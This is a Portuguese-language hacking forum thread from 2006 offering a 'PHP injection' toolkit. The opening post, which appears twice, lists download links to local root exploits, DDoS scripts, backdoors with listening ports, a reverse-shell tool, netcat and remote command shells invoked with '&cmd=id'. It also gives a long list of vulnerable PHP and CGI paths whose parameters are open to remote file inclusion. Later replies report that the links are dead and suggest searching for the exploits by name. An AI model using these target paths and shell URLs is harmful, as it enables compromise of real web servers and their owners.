Title: Ferramentas pra php-injection!
Post by: Anonymous on 10 de June , 2006, 09:02:27 PM
Post by: Anonymous on 10 de June , 2006, 09:02:27 PM
Arquivos atualizados.
Xpl Local:
http://hoob.webcindario.com/xpl_brk (http://hoob.webcindario.com/xpl_brk)
http://hoob.webcindario.com/brk2 (http://hoob.webcindario.com/brk2)
http://hoob.webcindario.com/ptracekmod (http://hoob.webcindario.com/ptracekmod)
http://hoob.webcindario.com/pt (http://hoob.webcindario.com/pt)
http://hoob.webcindario.com/ptrace24 (http://hoob.webcindario.com/ptrace24)
http://hoob.webcindario.com/mremap_pte (http://hoob.webcindario.com/mremap_pte)
http://hoob.webcindario.com/w00t (http://hoob.webcindario.com/w00t)
http://hoob.webcindario.com/mremap2 (http://hoob.webcindario.com/mremap2)
dDos:
http://hoob.webcindario.com/udp.pl (http://hoob.webcindario.com/udp.pl)
http://hoob.webcindario.com/f3 (http://hoob.webcindario.com/f3)
Mass:
http://hoob.webcindario.com/kaotic.pl (http://hoob.webcindario.com/kaotic.pl)
http://hoob.webcindario.com/cancer (http://hoob.webcindario.com/cancer)
Backdoor:
http://hoob.webcindario.com/r0nin (http://hoob.webcindario.com/r0nin) -> 1666
http://hoob.webcindario.com/cgi (http://hoob.webcindario.com/cgi) -> 44464
http://hoob.webcindario.com/bind (http://hoob.webcindario.com/bind) -> 4561
http://hoob.webcindario.com/bd.pl (http://hoob.webcindario.com/bd.pl) -> 9988
Conexao reversa:
http://hoob.webcindario.com/dc (http://hoob.webcindario.com/dc)
Pacote Perl( arquivos do grupo spykids ):
http://hoob.webcindario.com/pacote.zip (http://hoob.webcindario.com/pacote.zip)
NetCat:
http://hoob.webcindario.com/nc.exe (http://hoob.webcindario.com/nc.exe)
Scans:
http://hoob.webcindario.com/stringetz.zip (http://hoob.webcindario.com/stringetz.zip)
Cmd:
http://hoob.webcindario.com/cmd.gif (http://hoob.webcindario.com/cmd.gif)
http://jorbut.addr.com/~jorbut/inject.txt?&cmd=id (http://jorbut.addr.com/~jorbut/inject.txt?&cmd=id)
http://arrs.org/hbr.gif?&cmd=id (http://arrs.org/hbr.gif?&cmd=id)
http://lnx.hpgvip.com.br/newcmd.gif%3f&cmd=id (http://lnx.hpgvip.com.br/newcmd.gif%3f&cmd=id)
http://geocities.yahoo.com.br/phantasma ... &cmd=id (http://geocities.yahoo.com.br/phantasma_25/imagem/newcmd.gif.txt?&cmd=id)
http://www.rodrigo.hcerto.com/cmd.txt?&cmd=id (http://www.rodrigo.hcerto.com/cmd.txt?&cmd=id)
--------------------------------------------------------------------------------------------------------------------------------------------------------------
mais algumas strings
/catalog/includes/include_once.php?include_file=
/cgi-bin/wwwboard.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/ws_ftp.ini/cgi-bin/ezmall2000b/mall2000.cgi?page=
/modules/4nAlbum/public/displayCategory.php?basepath=
//modules/4nAlbum/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
//modules/My_eGallery/public/displayCategory.php?basepath=
//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/yb/Sources/Packages.php?sourcedir=
/forums/Sources/Packages.php?sourcedir=
/forum/Sources/Packages.php?sourcedir=
/cgi-bin/yabbse/Sources/Packages.php?sourcedir=
//shoutbox/expanded.php?conf=
/GradeMap/index.php?page=
/cgi-bin/ikonboard.cgi
/cgi-bin/ikonboard.cgi
/ikonboard/ikonboard.cgi
/cgi-bin/ikonboard/ikonboard.cgi
/cgi-bin/ikonboard/ikonboard.cgi
/cgi-bin/ikonboard/ikonboard.cgi
/yabbse/Sources/Packages.php?sourcedir=
/modules/coppermine/themes/maze/theme.php?THEME_DIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/shoutbox/expanded.php?conf=
/dotproject/modules/files/index_table.php?root_dir=
/allmyguest/include/info.inc.php?_AMGconfig[cfg_serverpath]==
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/cgi-bin/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/includes/Cache/Lite/Function.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/becommunity/community/index.php?pageurl=
/admin/store.log
/database/cactushop4.mdb
/estore1/shopping400.mdb
/cgi/i-shoppro/admin/store.log
/index.php?pageurl=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/template.php?pagina=
/e107/e107_handlers/secure_img_render.php?p=
Isso ae vlw.
Ps: Materia postada por DeadClown no PH
Xpl Local:
http://hoob.webcindario.com/xpl_brk (http://hoob.webcindario.com/xpl_brk)
http://hoob.webcindario.com/brk2 (http://hoob.webcindario.com/brk2)
http://hoob.webcindario.com/ptracekmod (http://hoob.webcindario.com/ptracekmod)
http://hoob.webcindario.com/pt (http://hoob.webcindario.com/pt)
http://hoob.webcindario.com/ptrace24 (http://hoob.webcindario.com/ptrace24)
http://hoob.webcindario.com/mremap_pte (http://hoob.webcindario.com/mremap_pte)
http://hoob.webcindario.com/w00t (http://hoob.webcindario.com/w00t)
http://hoob.webcindario.com/mremap2 (http://hoob.webcindario.com/mremap2)
dDos:
http://hoob.webcindario.com/udp.pl (http://hoob.webcindario.com/udp.pl)
http://hoob.webcindario.com/f3 (http://hoob.webcindario.com/f3)
Mass:
http://hoob.webcindario.com/kaotic.pl (http://hoob.webcindario.com/kaotic.pl)
http://hoob.webcindario.com/cancer (http://hoob.webcindario.com/cancer)
Backdoor:
http://hoob.webcindario.com/r0nin (http://hoob.webcindario.com/r0nin) -> 1666
http://hoob.webcindario.com/cgi (http://hoob.webcindario.com/cgi) -> 44464
http://hoob.webcindario.com/bind (http://hoob.webcindario.com/bind) -> 4561
http://hoob.webcindario.com/bd.pl (http://hoob.webcindario.com/bd.pl) -> 9988
Conexao reversa:
http://hoob.webcindario.com/dc (http://hoob.webcindario.com/dc)
Pacote Perl( arquivos do grupo spykids ):
http://hoob.webcindario.com/pacote.zip (http://hoob.webcindario.com/pacote.zip)
NetCat:
http://hoob.webcindario.com/nc.exe (http://hoob.webcindario.com/nc.exe)
Scans:
http://hoob.webcindario.com/stringetz.zip (http://hoob.webcindario.com/stringetz.zip)
Cmd:
http://hoob.webcindario.com/cmd.gif (http://hoob.webcindario.com/cmd.gif)
http://jorbut.addr.com/~jorbut/inject.txt?&cmd=id (http://jorbut.addr.com/~jorbut/inject.txt?&cmd=id)
http://arrs.org/hbr.gif?&cmd=id (http://arrs.org/hbr.gif?&cmd=id)
http://lnx.hpgvip.com.br/newcmd.gif%3f&cmd=id (http://lnx.hpgvip.com.br/newcmd.gif%3f&cmd=id)
http://geocities.yahoo.com.br/phantasma ... &cmd=id (http://geocities.yahoo.com.br/phantasma_25/imagem/newcmd.gif.txt?&cmd=id)
http://www.rodrigo.hcerto.com/cmd.txt?&cmd=id (http://www.rodrigo.hcerto.com/cmd.txt?&cmd=id)
--------------------------------------------------------------------------------------------------------------------------------------------------------------
mais algumas strings
/catalog/includes/include_once.php?include_file=
/cgi-bin/wwwboard.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/ws_ftp.ini/cgi-bin/ezmall2000b/mall2000.cgi?page=
/modules/4nAlbum/public/displayCategory.php?basepath=
//modules/4nAlbum/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
//modules/My_eGallery/public/displayCategory.php?basepath=
//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/yb/Sources/Packages.php?sourcedir=
/forums/Sources/Packages.php?sourcedir=
/forum/Sources/Packages.php?sourcedir=
/cgi-bin/yabbse/Sources/Packages.php?sourcedir=
//shoutbox/expanded.php?conf=
/GradeMap/index.php?page=
/cgi-bin/ikonboard.cgi
/cgi-bin/ikonboard.cgi
/ikonboard/ikonboard.cgi
/cgi-bin/ikonboard/ikonboard.cgi
/cgi-bin/ikonboard/ikonboard.cgi
/cgi-bin/ikonboard/ikonboard.cgi
/yabbse/Sources/Packages.php?sourcedir=
/modules/coppermine/themes/maze/theme.php?THEME_DIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/shoutbox/expanded.php?conf=
/dotproject/modules/files/index_table.php?root_dir=
/allmyguest/include/info.inc.php?_AMGconfig[cfg_serverpath]==
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/cgi-bin/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/includes/Cache/Lite/Function.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/becommunity/community/index.php?pageurl=
/admin/store.log
/database/cactushop4.mdb
/estore1/shopping400.mdb
/cgi/i-shoppro/admin/store.log
/index.php?pageurl=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/template.php?pagina=
/e107/e107_handlers/secure_img_render.php?p=
Isso ae vlw.
Ps: Materia postada por DeadClown no PH
Title: Re: Como explorar PHP injection
Post by: d3rf on 29 de June , 2006, 11:36:08 AM
Post by: d3rf on 29 de June , 2006, 11:36:08 AM
Kara explica ae, pq assim parece algo seu utilidade ...
Dá umas dicas de cada tópico, ok ?
Dá umas dicas de cada tópico, ok ?
Title: Re: Como explorar PHP injection
Post by: slul on 29 de June , 2006, 01:04:42 PM
Post by: slul on 29 de June , 2006, 01:04:42 PM
Favor mudar título para
Ferramentas pra php-injection!
.
Abraços
Ferramentas pra php-injection!
.
Abraços
Title: Re: Ferramentas pra php-injection!
Post by: slul on 30 de June , 2006, 08:25:12 PM
Post by: slul on 30 de June , 2006, 08:25:12 PM
O post seria melhor se algum link funcionasse 
Abraços!
TODOS os links estão off-line
Abraços!
TODOS os links estão off-line
Title: Re: Ferramentas pra php-injection!
Post by: Wuefez on 02 de July , 2006, 03:34:29 PM
Post by: Wuefez on 02 de July , 2006, 03:34:29 PM
ferramentas para e php injection seriam cmds e coisas do tipo, não exploits de buffer overflow e race condition e etc...no caso isso ai seriam ferramentas pra catar root, colocar backdoor, fazer conexão reversa...
o titulo do tópico esta errado
^^
o titulo do tópico esta errado
^^
Title: Re: Ferramentas pra php-injection!
Post by: Anonymous on 04 de July , 2006, 03:03:29 PM
Post by: Anonymous on 04 de July , 2006, 03:03:29 PM
otimOO!
Title: Re: Ferramentas pra php-injection!
Post by: Anonymous on 05 de July , 2006, 08:55:18 AM
Post by: Anonymous on 05 de July , 2006, 08:55:18 AM
Xpls Locais não são ferramentas só para php injection
Sem Mais....
Sem Mais....
Title: Re: Ferramentas pra php-injection!
Post by: Anonymous on 06 de July , 2006, 08:59:48 AM
Post by: Anonymous on 06 de July , 2006, 08:59:48 AM
muito bom post mesmo....valew.....
desculpa o flood...
...
desculpa o flood...
...
Title: Re: Ferramentas pra php-injection!
Post by: rodweb on 06 de July , 2006, 09:19:21 AM
Post by: rodweb on 06 de July , 2006, 09:19:21 AM
né flood naum...
13- Sobre o flooder:
a) Será caracterizado "flooder" o usuário persistente em postar mensagens nas quais não colaboram ou não contribuem de forma alguma no assunto tratado, da seguinte maneira:
- apenas confirmando uma afirmação anterior postada por outro usuário sem nada a acrescentar ou relatar sua experiência;
- simulando freqüentemente risadas, gozações e desvirtuando-se do assunto tratado no tópico;
- postar outra mensagem imediatamente seguida da própria postada, sem que outro usuário tenha postado nada, a título de aumentar o número de postagens sem editar a anterior.
comentar naum é flood...eu acho :P
13- Sobre o flooder:
a) Será caracterizado "flooder" o usuário persistente em postar mensagens nas quais não colaboram ou não contribuem de forma alguma no assunto tratado, da seguinte maneira:
- apenas confirmando uma afirmação anterior postada por outro usuário sem nada a acrescentar ou relatar sua experiência;
- simulando freqüentemente risadas, gozações e desvirtuando-se do assunto tratado no tópico;
- postar outra mensagem imediatamente seguida da própria postada, sem que outro usuário tenha postado nada, a título de aumentar o número de postagens sem editar a anterior.
comentar naum é flood...eu acho :P
Title: Re: Ferramentas pra php-injection!
Post by: Exter on 02 de March , 2007, 10:29:33 PM
Post by: Exter on 02 de March , 2007, 10:29:33 PM
tudo offf man =/
Title: Re: Ferramentas pra php-injection!
Post by: bironet on 04 de March , 2007, 03:58:10 AM
Post by: bironet on 04 de March , 2007, 03:58:10 AM
Todos os links quebrados... ???
Title: Re: Ferramentas pra php-injection!
Post by: Fvox on 18 de March , 2007, 02:05:45 PM
Post by: Fvox on 18 de March , 2007, 02:05:45 PM
Quote from: "slul"O post seria melhor se algum link funcionasse
Abraços!
TODOS os links estão off-line
hahahaha verdade
mas se procurar no google pelo nome dos exploits da para achar xD